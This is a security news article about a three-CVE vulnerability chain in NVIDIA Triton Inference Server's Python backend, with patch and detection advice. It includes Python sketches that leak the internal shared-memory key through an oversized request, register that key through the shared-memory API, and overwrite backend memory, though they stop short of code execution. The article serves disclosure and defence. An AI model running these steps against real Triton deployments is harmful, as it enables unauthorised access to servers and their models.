A critical vulnerability chain in NVIDIA’s Triton Inference Server allows unauthenticated attackers to achieve full remote code execution (RCE) and take complete control of AI servers.
The vulnerability chain, tracked as CVE-2025-23319, CVE-2025-23320, and CVE-2025-23334, exploits the server’s Python backend through a sophisticated three-step attack process involving shared memory manipulation.
Key Takeaways
1. The CVE-2025-23319 chain allows attackers to fully take over NVIDIA Triton AI servers.
2. Attackers exploit error messages to leak shared memory names, then abuse the shared memory API for remote code execution.
3. Update immediately – the flaw affects widely used AI deployment infrastructure.
Vulnerability Chain Targets NVIDIA Triton Inference Server
The vulnerability chain targets NVIDIA Triton Inference Server, a widely deployed open-source platform used to run AI models at scale across enterprises.
Wiz Research responsibly disclosed the findings to NVIDIA, and patches were released on August 4, 2025.
The attack begins with a minor information leak but escalates to complete system compromise, posing significant risks including theft of proprietary AI models, exposure of sensitive data, manipulation of AI model responses, and network pivot points for attackers.
The vulnerability specifically affects the Python backend, one of the most popular and versatile backends in the Triton ecosystem.
This backend not only serves models written in Python but also acts as a dependency for other backends, significantly expanding the potential attack surface.
Organizations using Triton for AI/ML operations face immediate threats to their intellectual property and operational security.
The attack chain employs a sophisticated Inter-Process Communication (IPC) exploitation technique through shared memory regions located at /dev/shm/.
Step 1 involves triggering an information disclosure vulnerability with crafted oversized requests that cause exceptions, revealing the backend’s internal shared memory name in error messages such as “Failed to increase the shared memory pool size for key ‘triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859’”.
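The mechanics of this step can be illustrated with a short sketch. The snippet below is a minimal, hypothetical reconstruction of the information-leak probe, not the researchers’ actual proof of concept: the target URL, model name, and request size are assumptions, and the parsing step simply looks for the region-name pattern quoted above.

```python
import re
import requests

# Assumed values for illustration only -- not taken from the original research.
TRITON_URL = "http://target:8000"      # Triton's default HTTP port
MODEL = "example_python_model"         # any model served by the Python backend

# Craft an inference request whose payload is large enough to make the
# Python backend grow its shared memory pool and raise an exception.
payload = {
    "inputs": [{
        "name": "INPUT0",
        "datatype": "BYTES",
        "shape": [1],
        "data": ["A" * 10_000_000],    # oversized input (assumed trigger size)
    }]
}

resp = requests.post(f"{TRITON_URL}/v2/models/{MODEL}/infer", json=payload)

# On vulnerable builds, the error text may echo the backend's internal
# shared memory key, e.g. 'triton_python_backend_shm_region_<uuid>'.
match = re.search(r"triton_python_backend_shm_region_[0-9a-f\-]+", resp.text)
if match:
    print("Leaked internal shm region:", match.group(0))
else:
    print("No region name leaked; the server may be patched.")
```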
Step 2 exploits Triton’s user-facing shared memory API, which lacks proper validation to distinguish between legitimate user-owned regions and the server’s private internal ones.
Attackers can register the leaked internal shared memory key through the registration endpoint, gaining read/write primitives into the Python backend’s private memory, which contains critical data structures and control mechanisms.
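Triton’s KServe protocol exposes a system shared memory registration endpoint, and a minimal sketch of how the leaked key could be re-registered as a user-owned region is shown below. The target URL, region name, byte size, and leaked key are placeholders, and the sketch only demonstrates the missing-validation behavior described above.

```python
import requests

TRITON_URL = "http://target:8000"                        # assumed target
LEAKED_KEY = "triton_python_backend_shm_region_<uuid>"   # value leaked in Step 1
REGION_NAME = "attacker_region"                          # arbitrary user-chosen name

# Register the backend's private shared memory segment as if it were a normal
# user-owned region. On vulnerable versions the server does not verify that
# the key refers to one of its own internal segments.
resp = requests.post(
    f"{TRITON_URL}/v2/systemsharedmemory/region/{REGION_NAME}/register",
    json={
        "key": LEAKED_KEY,     # /dev/shm key of the backend's private region
        "offset": 0,
        "byte_size": 1048576,  # assumed size; must not exceed the real segment
    },
)
print(resp.status_code, resp.text)

# The registered region can now be referenced by name in later inference
# requests, which is what yields access to the backend's memory.
status = requests.get(f"{TRITON_URL}/v2/systemsharedmemory/status")
print(status.json())
```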
NVIDIA Triton Vulnerability Chain
Step 3 leverages this memory access to corrupt existing data structures, manipulate pointers such as MemoryShm and SendMessageBase for out-of-bounds memory access, and craft malicious IPC messages to achieve remote code execution.
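As a purely illustrative sketch, one way such a write primitive could be exercised is by pointing an inference output at the registered region through the protocol’s shared-memory output parameters. The model name, tensor names, offset, and payload below are assumptions, and the sketch deliberately stops short of the structure corruption and IPC message crafting the researchers describe.

```python
import requests

TRITON_URL = "http://target:8000"    # assumed target
MODEL = "example_python_model"       # assumed model on the Python backend
REGION_NAME = "attacker_region"      # region registered in Step 2

# Ask the server to place an inference output at an attacker-chosen offset
# inside the registered region. Because that region is really the backend's
# private memory, the output bytes land on top of internal state.
payload = {
    "inputs": [{
        "name": "INPUT0",
        "datatype": "UINT8",
        "shape": [64],
        "data": list(range(64)),                 # attacker-controlled bytes
    }],
    "outputs": [{
        "name": "OUTPUT0",
        "parameters": {
            "shared_memory_region": REGION_NAME,
            "shared_memory_byte_size": 64,
            "shared_memory_offset": 0x1000,      # hypothetical offset of a target structure
        },
    }],
}

resp = requests.post(f"{TRITON_URL}/v2/models/{MODEL}/infer", json=payload)
print(resp.status_code)

# Turning an overwrite like this into code execution requires knowledge of the
# internal MemoryShm / SendMessageBase layouts and crafted IPC messages,
# which are not reproduced here.
```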
NVIDIA has released patches in Triton Inference Server version 25.07, and organizations should update immediately.
The vulnerability affects both the main server and the Python backend components, requiring comprehensive updates across all deployments.
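A quick way to see which build a deployment is running is the server metadata endpoint. The sketch below assumes a locally reachable instance on the default HTTP port and simply prints the reported version for comparison against NVIDIA’s release notes.

```python
import requests

TRITON_URL = "http://localhost:8000"   # assumed local deployment

# GET /v2 returns server metadata, including the Triton core version string.
meta = requests.get(f"{TRITON_URL}/v2").json()
print("Server:", meta.get("name"), "core version:", meta.get("version"))

# The core version reported here maps to an NGC container release (the 25.07
# container carries the fix); cross-check the value against NVIDIA's release
# notes to confirm the deployment is patched.
```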
Wiz customers can use specialized detection queries in the Vulnerability Findings page and Security Graph to identify vulnerable instances, including publicly exposed VMs, serverless functions, and containers.